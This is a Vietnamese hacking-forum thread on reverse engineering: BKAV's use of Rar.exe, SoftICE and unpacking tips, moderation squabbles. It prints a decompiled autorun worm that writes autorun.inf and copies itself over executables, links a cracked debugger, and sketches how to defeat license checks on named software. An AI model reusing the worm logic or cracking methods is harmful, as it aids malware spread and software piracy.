|
|
Hi all, vui lòng quay về với chủ đề đang thảo luận. Chủ đề là thảo luận về các khả năng vi phạm của BKAV. Vui lòng không bàn tán về quá trình kích hoạt bản quyền của BKAV, nếu làm thế vô tình chúng ta sẽ vi phạm bản quyền BKAV. Tôi warn đồng chí chinhtruc 1 sẹo với lý do đồng chí sa đà vào các chi tiết không dính dáng đến chủ đề. Đồng chí đả kích người khác với thái độ không thiện chí.
Thay mặt BQT HVA, tôi nhắc lại một lần nữa, anh em thảo luận thì thoải mái thôi, nhưng vui lòng đừng sa đà vào các ý kiến chủ quan của mình, đồng thời đừng hãy tôn trọng người khác. Nếu các bạn làm trái quy định chung của diễn đàn, tài khoản của các bạn sẽ bị khoá vĩnh viễn.
Trân trọng!
|
|
|
BTW, quá trình upload một tập tin lên máy chủ của BKAV sẽ dùng qua Rar.exe và dùng lệnh nén lại các log file ghi được các tham số sau: a -hpa -m1 -md64 -dh. Sau đó quan trọng nhất là lệnh DeleteFileW(&Filename); lệnh này sẽ được gọi nhiều lần để delete các tập tin đã được nén sau khi upload lên server, và cả tập tin rar351.exe, nhưng tôi không thấy lệnh del rarreg.key. Nếu BKAV Pro có bản quyền cho Rar.exe, tức cũng phải delete cả file này sau khi extract chung thư mục với file rar351.exe. Do đó tôi thắc mắc một điều, có phải khi registered BKAV Pro, thì mình sẽ tải được phiên bản khác, bản này có nhúng kèm rarreg.key. Do không có điều kiện, chỉ test bản pro ở site bkav.com.vn nên có chút hoài nghi?
Còn nếu không, thì khi BKAV nén các thông tin thì console sẽ hiện như thế này:
Code:
D:\test>rar a -hpa -m1 -md64 -dh test.rar
RAR 3.60 Copyright (c) 1993-2006 Alexander Roshal 5 Aug 2006
Shareware version Type RAR -? for help
Evaluation copy. Please register.
Creating archive test.rar
Adding dup2.exe OK
Done
|
|
|
@boom_jt:
Việc đúng hay sai của vấn đề cho tới giờ boom thấy chưa hoàn toàn thật sự rõ ràng, vì vậy mọi người khi bình luận cũng nên giữ lời 1 chút, đừng để lời nói của mình thành hàm hồ, bao gồm cả những ý kiến bảo vệ cũng như phản đối.
Các phân tích, các nhận định của anh em trong các trang trước vậy mà bạn bảo chưa rõ ràng thì tôi cũng hết cách.
Nói đến rar, tự nhiên boom nhớ tới Total Commander, không rõ có ai để ý không, hình như phần mềm này có sử dụng rar.exe cho việc nén và giải nén file rar. Cụ thể hơn thì boom cần xem lại rồi nói sau nhé, vì hiện tại máy ko có cài. Nếu ai có cài sẵn thì check hộ boom xem đó có phải liên quan tới vấn đề bản quyền không. Thiệt tình thì boom biết không nhiều, nhân việc này mới đem ra hỏi và cũng có thể coi là 1 sự liên hệ, biết đâu nó có ích chăng.
Việc Total Commander có rar, đó là external plugin không, có nghĩa bạn phải define plugin này bằng cách tham chiếu tới folder đã cài Rar, nghĩa là TC không có trách nhiệm với bản quyền RARLab... Nếu muốn minh chứng hay chỉ rõ vấn đề gì thì phải làm tới nơi tới chốn, đừng có nhớ man mán hay viện cớ là chưa cài, chưa thử nhưng nghĩ...
Xem thêm ở : http://ghisler.com/tools.htm#packers
và hình minh chứng:
Rar plugin không được cài đặt trong bản thương mại của TC và họ có đăng tải rõ ràng trên website của mình.
Và TC cũng không liên quan đến vấn đề đang bàn ở đây, đừng lôi nó vào cuộc!
|
|
|
Hình như bác bị ám ảnh chữ "Tây" nên đầu óc bác có vấn đề. Bác chỉ đi xỉa xói những lời nói câu chữ mà không thấy vào sự thật của vấn đề. Để em cho trình bày một tí cho bác rồi lock bác lại. Để bác phát ngôn linh tinh dòm chả ra cái gì cả.
1. Như đã trình bày ở các trang trước. Rarlab không thể vì bán lic cho 1 cá nhân hay tập thể nào đó mà vi phạm nguyên tắc bán hàng của mình (ở đây là cho phép BKIS dùng riêng RAR.exe và nhúng vào chương trình). Bác làm việc với Tây mà sao không đọc kỹ phát ngôn hàm hồ, còn chỉ trích người khác chụp mũ, hàm hồ.
2. Bác nói rằng BKAV mã hoá rarreg.key trong resource để khi exetract ra thì đọc và chuyển thành có license là sai. Vì quá trình này hoàn toàn có thể kiểm chứng bằng các method rất cơ bản như Hook hệ thống, Hook các hàm API như đọc ghi các file. Trong quá trình hook, hoàn toàn không thấy quá trình decrypt và extract (sở dĩ phải extract vì rar.exe chỉ có thể đọc license ở local dir mà không thể đọc qua remote hoặc bất cứ param nào) ra file đăng ký của Rar.exe.
3. Đó là vấn đề quan sát BKAV, giờ xin lạm bàn về vấn đề cởi mở cõi lòng. Nhớ trong truyện Kim Dung có Nhạc Bất Quần thì giờ có bác, bác ca ngợi Tây đủ điều, xin thưa với bác là anh em ở trong đây khối người làm việc với với Tây còn nhiều hơn bác ăn cơm nữa ạ. Tây cũng có anh tốt anh xấu, anh pro và anh noob, cũng có đứa ác và anh thiện. Tại bác là người VN nên hỏi nó, nói bảo là tốt vì nếu không mấy bác đông hơn, chặn đường oánh nó thì sao. Còn nếu bạn bè nó hỏi, thì chắc không phải như vậy đâu bác à. Bác bi bô cái miệng về tha thứ về mở cõi lòng thì hay lắm nhưng thật sự bác làm được vậy thì không vào đây bới lông tìm vết những chuyện nhỏ nhặt tiểu tiết. Qua 2 post của bác, thì 2 lần bác cay cú các anh em bên ddth, chắc qua đó chém gió bậy bạ nên bị lock acc rồi qua đây giảng đạo hả bác. Thôi em tiễn bác lên đường bình an. Nếu lập nick khác mà vô đây spam nữa thì em lock tiếp.
|
|
|
@gsmth: Nói thật bạn đừng buồn, bạn chưa rõ về RE thì đừng có post nữa, sao bạn biết là bug của phần mềm không do ai công nhận. Ở RE không gọi là bug mà khi tìm được cách qua mặt, hay xử lý một điểm yếu, nghiên cứu cách bảo vệ gọi là method. Tức là phương thức để khai thác cái lỗi (lỗi là từ gọi đơn giản, chứ thật ra đó là quá trình phân tích code của một phương thức bảo vệ nào đó, từ đó đưa ra những biện pháp khắc chế lại nó) đó, và khi một reverser hay team bất kỳ nào dùng đến nó họ đều có thank hay trích dẫn thông tin cả cả. Đọc các tut của các reverser trên các public hay private board, bạn có thấy dòng Greets Fly Out và Reference không. Họ ghi rõ ràng là tài liệu họ có ở đâu, dựa vào method của ai.
Đơn cử cho bạn thấy về sự tôn trọng method :
-Armadillo dùng cơ chế Nanomite, IAT Elimination, HWid, Copymem, Code Splicing. Và các cơ chế này đã bị Cracks Latinos defeat. Và ngày nay tất cả các tut về Armadillo hầu hết đều ghi rõ lời cảm ơn tới CrackLatinos nếu sử dụng lại các method này.
ExeCryptor thì nhắc tới softworm.
-Themida thì nhắc tới Deroko, Shooo và Computer Angel.
-dot NET thì nhắc tới Labba và Rongchaua.
Nếu bạn cho rằng dân RE nước ngoài là giỏi thì chưa hẳn đâu, người VN mình ở các team nước ngoài, họ vẫn phải học hỏi mình mà.
Trích dẫn câu: "bug này được tìm ra sau 3 hay 4 giờ sản phẩm XYZ ra bản chính thức." Thực ra dân RE không bảo như vậy thật mà chỉ bảo thế này thôi: " Cách protect mới nhất soft XYZ này đã bị thịt xong sau 3 hay 4 giờ release và đây là link download ! "
Còn câu:" tại sao không làm 1 cái AV tốt hơn của Bkav nhỉ? liệu có đủ sức không, đủ kiên nhẫn, đủ thời gian?" thì quá nhàm rồi. Đừng vin vào cái có nữa, nó nhảm và nhàm quá rồi. Nói như bạn thì mấy cha phê bình văn học bị mấy ông nhà văn đập bể đầu rồi.
Biết thì nói, không biết thì tìm hiểu hãy phát biểu nha bạn. Thread này để các bạn thảo luận, trao đổi, chứ không cạnh khoé hàm ý chê bai. Tôi sẽ lock bất cứ ai cố tình vi phạm, dù cho elite hay member.
@lion_king_lovely_1985: Bàn chính trị không đúng chỗ. Tôi lock bạn 1 tuần!
|
|
|
Nếu AV đã xoá file bạn của bạn thì có thể dùng các tools để recovery lại. Tuy nhiên khả năng là rất ít, vì các AV có thể tích hợp các thuật toán băm để xoá file vĩnh viễn như Air Force System Security, US Army, NCS Center, DOD-5220.22-M, Natural Security Agency thì cơ hội phục hồi file của bạn gần bằng 0.
@thichamdaonhan: Vui lòng đăng ký lại nick khác, nick bạn dễ gây hiểu lầm. Do mod sơ xuất trong quá trình điều hợp nên để lọt lưới trường hợp này.
|
|
|
BKAV add db trực tiếp vào chương trình, làm sao mà chuyển đổi được hả Hoàng, muốn chuyển đổi phải export db ra. Qua quan sát mã asm của BKAV, tôi thấy tác giả gom các dạng chung của virus về cách ghi khoá, mã nhận dạng vào một group rồi call đến hàm xử lý. Mã nhận dạng hình như là CRC32. Nếu chịu quan sát các đoạn code này, các bạn cũng có thể hình dung được cách diệt của AV này. Toàn bộ thông tin về virus sẽ được add trực tiếp vào chương trình. Size gốc của Bkav2006.exe là 50Mbs, pack lại bằng Telock (một packer code bởi tE! một thành viên của nhóm Cracker TMG huyền thoại). Do đó các bạn đừng trách tại sao KAV, NAV chỉ cần update file text có mấy mươi kb mà BKAV phải load cả tập tin cài đặt về. Thế là còn đỡ, nếu như không pack lại thì hoạ may có lease line mới auto update được!
Một thắc mắc tiếp là sao BKAV ko chọn UPX để pack file mà lại chọn một packer do một nhóm cracker dev nhỉ .
|
|
|
Minh họa hình ảnh:
1. Xem resource trong dll.
2. Chạy resource ở command line sau khi extract ra:
3.Call Rar
|
|
|
Anh em dạo này khoái xài theme màu đen nhể , từ lão tới ku trick
|
|
|
Tôi lock thường chỉ 2 lý do, bạn mở topic request crack không trong thread yêu cầu, thứ 2 là spam linh tinh. Tôi không lock bạn vì thread đó mà vì cái này.
Code:
http://hvaonline.net/hvaonline/posts/list/22393.html
Tôi lập lại một lần nữa, anh em request fix thì đã có chủ đề, anh em vào post trong đó, và có thể trong điều kiện cho phép tôi sẽ giúp được anh em, và chỉ post 1 lần duy nhất, tôi sẽ ghi vào notepad các link đó, khi nào kiếm được tôi sẽ trả lời.
|
|
|
Chả biết bao giờ nước ta tổ chức một hội thảo như thế này:
http://recon.cx/2008/index.html
Guest speakers:
Ilfak Guilfanov
Michael Strangelove
Other not-so-famous speakers you might know:
tHE mUTABLE
TiGa
Woodmann will also be attending.
Slides and videos of the past editions are available too.
Conference Details
The conference will be composed of 30 and 60 minutes talks on a single track, and will have lightning talks during Recon Party.
Guest Speakers
Ilfak Guilfanov - Building plugins for IDA Pro
Michael Strangelove - Hacking Culture
Speakers
Pierre-Marc Bureau - How I learned Reverse Engineering with Storm
Tiller Beauchamp - RE:Trace - Applied Reverse Engineering on OS X
Sharon Conheady and Alex Bayly - Social Engineering for the “Socially Inept”
Bruce Dang - Methods for analyzing malicious Office documents
Sébastien Doucet (TiGa)- 64-bit Imports Rebuilding and Unpacking
Thomas Garnier - Windows privilege escalation through LPC & ALPC interfaces
Cameron Hotchkies - Under the iHood
Eric D. Laspe - The Deobfuscator
Mohammed Fadel Mokbel(tHE mUTABLE) - Towards an Embellished Macro Descriptive Language for Reverse Assembly Code
Anthony de Almeida Lopes - Bypassing Security Protections by Backdooring libc
Aaron Portnoy and Ali Rizvi-Santiago - Reverse Engineering Dynamic Languages, a Focus on Python
Nicolas Pouvesle - NetWare kernel stack overflow exploitation
Jason Raber - Helikaon Linux Debuger
Gera - TBA
Craig Smith - Creating Code Obfuscation Virtual Machines
Pablo Sole - RE over Adobe Acrobat Reader using Immunity Debugger
Alexander Sotirov - Blackbox Reversing Of XSS Filters
Trong đây thích nhất lão TiGA !
|
|
|
Vietnam mình chỉ dừng ở mức self-research thôi, chưa có tổ chức nào đứng ra dạy cả vì không có nhân lực và không có quy phạm pháp luật bảo hộ cho việc này.
Ở TP HCM tôi thấy có ICARE mở trường dạy về bác sĩ máy tính (bao gồm cả việc phân tích và diệt virus) nhưng tôi không hiểu họ đào tạo ra sao nữa. Gần đây nghe nói BKIS cũng hợp tác với ICARE để đào tạo và phát triển ngành an ninh mạng. Đúng là song đại bác hợp bích !
|
|
|
Lão rồng đã làm luôn một series ebook cho .NET Reversing, anh có thể xem qua ở đây:
http://rongchaua.net/dotnet/reverse-.net-software.html
Code:
Article 1 : Reverse .Net Software I: Introduction about Reflector
Article 2 : Reverse .Net Software II: Introduction of Dotfuscator
Article 3 : Reverse .Net Software III: Introduction of patching in .net
Article 4 : Reverse .Net Software IV: Patch and strong name
Article 5 : Reverse .Net Software V: Introduction of packer in .net - NS Pack 3.7
Article 6 : Reverse .Net Software VI: The weakness of .net application
Article 7: Reverse .Net Software VII: Debug, Advanced Patch and Fishing PIN
Article 8: Reverse .Net Software VIII: A deep look about obfuscation
|
|
|
Link download SoftICE 4.32 tested work fine in XPSP2:
Code:
http://cracklab.ru/_dl/_/DriverStudio_3.2_CRACKLAB.rU.rar
Link download Syser Debugger 1.97.1900.1016 2008.5.27 :
Code:
http://rapidshare.com/files/119028937/Sys.Debug.v1.97.1900.1016.zip
Mình trích bài của thienthandien bên REA về cài SofIce trên VMWare cho các bạn tham khảo:
Dành cho những ai yêu thích softice nhưng ngại cài trên máy thật vì nó hay gây crash máy. Một vài dòng nhỏ nhỏ là softice có thể chạy tốt trên máy ảo rùi. Ở đây tôi test với vmware (dùng nhiều hđh khác nhau), các bạn có thể tìm thấy file .vmx trong folder chưa hđh ảo, mở file này với notepad cho đơn giản, rồi thêm vào:
Code:
vmmouse.present = "FALSE"
svga.maxFullscreenRefreshTick = "5"
svga.forceTraces = "TRUE"
sau dòng
Code:
sound.autodetect = "TRUE"
là được.
Ngoài ra khi cài softice các bạn nên chọn chế độ manual, tức chỉ khi nào cần thì mới gọi nó lên. Thêm một chút config softice mà tôi đang dùng:
Code:
1. Settings -> SoftICE Initialization -> General -> Initialization string:
color f a 1f 1f a;code on;lines 60;wc 36;wd 6;faults off;ww 4;dex 1 ss:esp;altkey ctrl d;watch ds:esi;watch es:edi;set mouse 3;cls;X;
2. Settings -> SoftICE Initialization -> General -> Video Memory Size:
4096
|
|
|
Hi anh em, mình đang thuê trọn gói MEGA ME của FPT đường truyền 5120 kbps / 640 kbps. Lúc đầu download thì rất cao khoảng 300->500kbs với Microsofts.com, 300->800kb/s với rapidshare.com và megaupload.com. Nhưng cả hai tuần nay thì down chỉ tầm 20->50/kb/s là hết mức . Mình gọi cho FPT cả mấy chục lần mới gặp được tổng đài, họ bảo sẽ cử kỹ thuật xuống. Sáng nay 2 chú ktv xuống máy ping vài cái lên dns server rồi bảo mạng dek có vấn đề gì rồi ra về. Họ bảo cái này bên kỹ thuật chứ không phải do đường dây. Nghe một số người bảo là FPT đã giới hạn rapidshare.com và megaupload.com rồi. Các bạn nào xài của FPT cho mình hỏi cái nha. Cám ơn nhiếu
|
|
|
Abstract
Debugging applications or drivers are part of every programmer’s day.
Nearly every IDE I know has its own debugger. Most of them suck in
several ways and often don’t fulfil all the needs the coder has. Especially
when developing a ring0 application, such as a driver for a video or audio
device. Without a powerful kernel debugger it’s very hard for the coding
artist to fix problems, because as you know bigger programming faults
lead to bluescreens, followed by a reboot. Referring to the security or
antivirus scene a debugger is often used when reversing a binary for
vulnerabilities or discovering the functionality of malware. The best
disassembler IDA Pro from Datarescue also supports debugging for some
time now and improves the reversers work when analyzing an application,
particularly when the binary is compressed with an executable packer.
Microsoft ships their Visual Studio with a nice debugger which has also the
capability of kernel debugging. But almost all debuggers have still some
disadvantages. In my opinion currently there’s only one debugger that is
nearly perfect, the world famous SoftICE. Formerly created by NuMega,
sold to Compuware in 1997 and now implemented in Driverstudio, SoftICE
is a fully featured debugger with dozens of commands I’ll try to bring you
closer in this essay. Have you ever wondered what the ICE stands for in
SoftICE? Quite easy, it means “In Circuit Emulator”. If you don’t know
what an ICE is, just google for it This paper will give you a step by step
introduction to SoftICE. First we’ll discuss the most important things while
installation and configuration as well as covering several problems that
can happen. Subsequent to this I will discuss hotkeys, the most important
basic and many advanced commands SoftICE has. Furthermore I will give
examples how to use them as well as alluding stumbling blocks with some
instructions. In the end of the document I prepared a list of useful API
calls, which may help when searching for the right breakpoint in future
debugging sessions. To reproduce all the things best, discussed here in
the following, you should be armed with WinXP or Win2003, Driverstudio
v3.2, IceExt v0.67, Spy & Capture v2.70 as well as VMWare Workstation
v5.5. Watch the link list at the bottom where to get the tools needed. The
reader of this document should have a basic understanding of x86
assembly and the fundamentals of debugging. Ok, let’s getting started
now.
Một tài liệu căn bản cho việc cài đặt và sử dụng SoftICe cho những ai muốn debug app trên user và kernel mode.
Nếu muốn tìm tài liệu bằng tiếng việt thì đọc lại tut "How to become a cracker" của tôi
Code:
Download file đính kèm theo bài viết!
|
|
|
Code:
F-Prot 4.4.2.54 2008.05.16 W32/SysKeylog.B.gen!Eldorado
F-Secure 6.70.13260.0 2008.05.20 Trojan-Downloader.Win32.Agent.ghs
Fortinet 3.14.0.0 2008.05.20 -
GData 2.0.7306.1023 2008.05.20 Trojan-Downloader.Win32.Agent.ghs
Ikarus T3.1.1.26.0 2008.05.20 Trojan-Spy.Win32.VB.kk
Kaspersky 7.0.0.125 2008.05.20 Trojan-Downloader.Win32.Agent.ghs
McAfee 5298 2008.05.19 W32/Autorun.worm.bm
Microsoft 1.3408 2008.05.13 Worm:Win32/Autorun.BP
Code:
Private Sub Timer2_Timer() '411D2C
'Data Table: 40B754
loc_4114E4: On Error Goto 0
loc_4114F4: ext_40104C
loc_4114FF: SetVarVarFunc
loc_411506: VarLateMemLdVar
loc_41150F: SetVarVarFunc
loc_411515: var_B6 = &H0
loc_411520: ForEachVar
loc_41152B: VarLateMemLdVar
loc_411531: var_14C = 1
loc_411546: ext_401080
loc_411551: ext_401024
loc_411563: var_1AC = var_17C And (var_17C <> "A")
loc_411572: ext_401080
loc_41157D: ext_401024
loc_4115A2: If CBool(var_1CC And (var_1CC <> "B")) Then
loc_4115A9: var_B6 = &HFF
loc_4115BF: var_15C = var_94 & "\" & "Secret.exe"
loc_4115C7: VarLateMemCallLdVar
loc_4115DE: If CBool(Not var_CC) Then
loc_41162A: var_21C = CStr(var_94 & "\" & "Secret.exe")
loc_411643: var_218 = App.Path & "\" & App.EXEName & ".exe"
loc_411646: ext_401068
loc_411684: var_204 = CStr(var_94 & "\" & "Secret.exe")
loc_411688: ext_401088
loc_411697: End If
loc_4116A3: var_12C = var_94 & "\autorun.inf"
loc_4116AB: VarLateMemCallLdVar
loc_4116BC: If CBool(var_CC) Then
loc_4116C1: On Error Goto loc_4116FC
loc_4116D7: var_204 = CStr(var_94 & "\autorun.inf")
loc_4116DB: ext_401088
loc_4116F0: var_12C = var_94 & "\autorun.inf"
loc_4116F4: ext_401028
loc_4116FC: End If
loc_4116FC: ' Referenced from: 4116C1
loc_411714: Open CStr(var_94 & "\autorun.inf") For Output As &H1 Len = &HFF
loc_411725: Print &H1, "[AUTORUN]"
loc_411732: Print &H1, "Shellexecute=Secret.exe"
loc_41173C: Close &H1
loc_411751: var_204 = CStr(var_94 & "\autorun.inf")
loc_411755: ext_401088
loc_41176C: VarLateMemCallLdRfVar
loc_411776: var_CC(var_94)(var_204) = &H6
loc_411777: DOC
loc_41177E: var_2BCB = ""
loc_411781: ThisVCallUI1
loc_411789: var_2B77 = InStr("", "", &H0, CInt(""))
loc_41178D: ExitForCollObj
loc_411794: FnStrComp3
loc_411798: DOC
loc_41179D: StLsetFixStr
loc_4117A2: CCur(("" * ("" < CInt("")(""))))("") = ""
loc_4117A3: DOC
loc_4117A5: arg_40FE = ""
loc_4117B3: arg_38FE = CSng(arg_25FE(13316))
loc_4117BB: Next var_2 'Integer
loc_4117C3: LateIdCallSt
loc_4117CC: InvalidExcode &HFC048F00
loc_4117D1: If -var_2C00 Then
loc_4117E3: = App.Path
loc_411804: VarLateMemLdVar
loc_41181C: var_21C = CStr(var_11C & "\" & "Lotovn.exe")
loc_411835: var_218 = "" & "\" & App.EXEName & ".exe"
loc_411838: ext_401068
loc_411861: VarLateMemLdVar
loc_411883: var_204 = CStr("" & "\" & "Lotovn.exe")
loc_411887: ext_401088
loc_41189C: ExitForVar
loc_4118A7: NextEachVar
loc_4118BC: LitVarUI1
loc_4118C2: Exit Sub
loc_4118C5: arg_1000 = (%x2 < CSng(arg_400C(13316)))
loc_4118CB: VarLateMemLdVar
loc_4118D4: SetVarVarFunc
loc_4118DE: ForEachVar
loc_4118E9: VarLateMemLdVar
loc_4118FB: VarLateMemLdVar
loc_411905: var_204 = CStr(var_94 & "\" & var_10C)
loc_411912: var_B4 = CVar(ext_401074) 'Variant
loc_411962: var_1BC = (var_B4 = 5) Or (var_B4 = 6) Or (var_B4 = 7) Or (var_B4 = 36)
loc_41199B: If CBool(var_1BC Or (var_B4 = 37) Or (var_B4 = 38) Or (var_B4 = 39)) Then
loc_4119A3: VarLateMemLdRfVar
loc_4119AE: VarLateMemLdRfVar
loc_4119B9: VarLateMemLdRfVar
loc_4119C4: VarLateMemLdRfVar
loc_4119CF: VarLateMemLdRfVar
loc_4119E2: ext_401084
loc_4119ED: ext_401004
loc_4119F5: var_14C = ".exe"
loc_411A0A: ext_401084
loc_411A15: ext_401004
loc_411A27: var_1EC = var_1BC Or (var_1BC = ".com")
loc_411A36: ext_401084
loc_411A41: ext_401004
loc_411A53: var_2BC = var_29C Or (var_29C = ".pif")
loc_411A62: ext_401084
loc_411A6D: ext_401004
loc_411A7F: var_30C = var_2EC Or (var_2EC = ".bat")
loc_411A8E: ext_401084
loc_411A99: ext_401004
loc_411AD2: If CBool(var_33C Or (var_33C = ".scr")) Then
loc_411ADA: VarLateMemLdVar
loc_411AEC: VarLateMemLdVar
loc_411AF6: var_204 = CStr(var_94 & "\" & var_10C)
loc_411B70: If (App.Path & "\" & App.EXEName & ".exe" <> ext_40106C) Then
loc_411B78: VarLateMemLdVar
loc_411B7F: var_BC = CStr(var_10C)
loc_411B8A: VarLateMemLdVar
loc_411B95: VarLateMemLdVar
loc_411BB5: var_204 = CStr("" & "\" & "")
loc_411BB9: ext_401088
loc_411BD1: VarLateMemLdVar
loc_411BE3: VarLateMemLdVar
loc_411BE9: var_17C = var_94 & "\" & var_10C
loc_411BED: ext_401028
loc_411C34: VarLateMemLdVar
loc_411C4D: var_21C = CStr(var_94 & "\" & CVar(var_BC))
loc_411C66: var_218 = App.Path & "\" & App.EXEName & ".exe"
loc_411C69: ext_401068
loc_411C92: VarLateMemLdVar
loc_411CB5: var_204 = CStr("" & "\" & CVar(var_BC))
loc_411CB9: ext_401088
loc_411CCA: End If
loc_411CCC: End If
loc_411CCE: End If
loc_411CD5: NextEachVar
loc_411CE2: NextEachVar
loc_411CF0: If var_94 Then
loc_411D04: Timer2.Interval = &H3E8
loc_411D0C: GoTo loc_411D28
loc_411D0F: End If
loc_411D20: Timer2.Interval = &H3A98
loc_411D28: ' Referenced from: 411D0C
loc_411D2A: Exit Sub
End Sub
|
|
|
^^ Dòm cái avatar của lão là sợ rồi . Thằng em tôi học SPKT HCM, nó làm ba cái con robo dùng mấy con cảm biến gia tốc. Tôi phụ nó làm thôi. Vui là chính .
|
|
|
Về mặt nguyên tắc khi chương trình "được" ta unpack hoàn toàn trên bộ nhớ (chỉ ở mức tương đối) qua các công cụ debug ở mức usermode hay kernelmode thì hoàn toàn có thể đọc code và triển khai các phương án là đọc mã để code keygen, tìm cách inline hay fish key.
Đại đa số các packer/protector hiện nay dùng khá nhiều kỹ thuật bảo vệ rất tinh vi nhưng vẫn ở usermode (dù dùng VM), do đó hiện tại hầu hết các unpacker trên thế giới đều chuộng OllyDBG vì nó trực quan, hơn nữa cách thức thể hiện code của nó rất mạch lạc, dễ trace. Các packer một thời được xem là hàng "khủng" đến thời điểm này đã bị defeat hoàn toàn trên OllyDBG như Armadillo, Themida, ExeCryptor, RLPack, ASProtect, ActiveMARK, PCGuard custom, Securom, SafeDisc, Telock...
Tuy nhiên nếu app là chạy ở kernel mode như các driver, các protector dùng nanomite, vm code như StarFoce, Winlicense thì SoftICe+WinDBG là lựa chọn duy nhất, tuy nhiên mỗi unpacker phải chỉnh lại bản IceText để anti-anti debug của các phần mềm này.
|
|
|
Search PE Tutorial trong box này. Trước tiên cậu muốn unpack hay tìm hiểu về một packer thì hãy hiểu về cấu trúc của PE File cái đã rồi hãy học unpacking. Có kiến thức về PE File, tiếp tục học ASM. Sau đó hãy unpack.
-Về nguyên lý pack phần mềm thì tham khảo mã nguồn của yoda crypter và UPX sẽ đúc kết được các phương pháp pack.
-ASProtect và Armadillo dùng các cơ chế IAT Elimination, Nanomite, Stolen byte, Debug Blocker để bảo vệ và kèm theo đó là các thuật tóa tạo key dựa trên RSA.
-IAT: http://sandsprite.com/CodeStuff/Understanding_imports.html
-OEP của ASProtect có thể dùng script hoặc dùng tay để search trong debugger.
-Các tìm OEP của các loại packer phổ thông thì có cơ chế tương tự, tham khảo generic unpacker của deroko (Google), nhưng với các loại packer phức tạp thì phải dùng các phương pháp khác nhau như lấy nano tabe, rebuild IAT, trace code VM...
-Nói chung cậu dùng keyword PE Tutorial để tìm tài liệu này về ngâm cứu, sau đó hãy học unpack. Theo cách hỏi của cậu tôi nghĩ cậu hoàn toàn không có khái niệm về Unpacking. Do đó hãy học về cấu trúc PE + kiến thức về C, ASM. Sau đó thì học unpack.
Thân!
|
|
|
Tui post tí cho bạn ấy thoả mãn rồi khóa lại, sorry IQ nhé. .
Như lão kiên nói, thực chất .lic cũng là một dạng ext license thôi, khi làm phần mềm bạn có thể đặt tên key file của mình tùy ý như .html, .abc... Làm dạng lic thì đại đa số các phầm mềm đều dùng một thuật toán để crypt nó như MD5 (Vlauto.net bản 3.xx), HAVAL (VulanPro.net), Rijndael+Base64(KidAuto+AutoSmart) và có những phần mềm dựa hẵn vào Cryto của Crypter mà mình dùng (TinhLaGi: Themida). Về mặt nguyên tắc thì hoàn toàn có thể đọc hiểu các thuật toán này (phải kô lão kiên ), và tạo ra một chuơng trình nhỏ để làm lic cho các soft bảo vệ kiểu này, một cách đơn giản khác là ta không quan tâm đến thuật toán tạo key của chưong trình mà research vào quá trình hook vào hệ thống để kết nối đến server (VLauto.net) hoặc tạo mã HDD, từ đó có các giải pháp là giả lập kết nối, giả lập bắt chương trình phải hiểu mã HDD của mình là đã registered. Nói chung với các tay đã từng cracking qua các app dùng keyfile thì hoàn toàn có thể thịt gọn các loại soft kiểu này !
@all: ai mà pm tôi xin crack các auto này là cho 1 sẹo ngay :T.
|
|
|
IDM 5.12build 9, build 10 đã fix lỗi 99.99% khi download ở mediafire. Cập nhật lên ver mới sẽ hết tình trạng này!
|
|
|
|
|
|
|